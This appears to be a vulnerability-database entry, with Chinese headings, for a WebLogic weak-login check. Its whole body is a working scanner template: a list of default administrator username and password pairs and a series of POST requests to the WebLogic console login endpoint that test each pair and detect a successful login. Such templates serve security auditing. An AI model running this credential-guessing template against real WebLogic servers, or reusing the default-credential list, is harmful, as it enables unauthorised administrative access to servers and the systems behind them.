weblogic-weak-login: WebLogic Weak Login

日期: 2025-08-01 | 影响软件: weblogic | POC: 已公开

漏洞描述

WebLogic default login credentials were discovered.

PoC代码[已公开]

id: weblogic-weak-login

info:
  name: WebLogic Weak Login
  author: shadown1ng
  description: |-
    WebLogic default login credentials were discovered.
  severity: high
  verified: true
  tags: weblogic,weak-login
  created: 2023/10/14

set:
  username: "weblogic"
  password-1: "weblogic"
  password-2: "weblogic1"
  password-3: "welcome1"
  password-4: "Oracle@123"
  password-5: "weblogic123"
  username-2: "admin"
  password-22: "12345678"
  password-23: "security"
  username-3: "system"
  password-33: "password"
rules:
  r00:
    request:
      method: HEAD
      path: /console/j_security_check
    expression: |
      response.status == 302  && response.headers['set-cookie'].contains("ADMINCONSOLESESSION")
    stop_if_mismatch: true
  r0:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username}}&j_password={{password-1}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r1:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username}}&j_password={{password-2}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r2:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username}}&j_password={{password-3}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r3:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username}}&j_password={{password-4}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r4:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username}}&j_password={{password-5}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r5:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username-2}}&j_password={{password-22}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r6:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username-2}}&j_password={{password-23}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
  r7:
    request:
      method: POST
      path: /console/j_security_check
      body: j_username={{username-3}}&j_password={{password-33}}&j_character_encoding=UTF-8
    expression: response.status == 302 && !response.headers["location"].icontains("LoginForm.jsp")
    stop_if_match: true
expression: r00() && (r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7())

相关漏洞推荐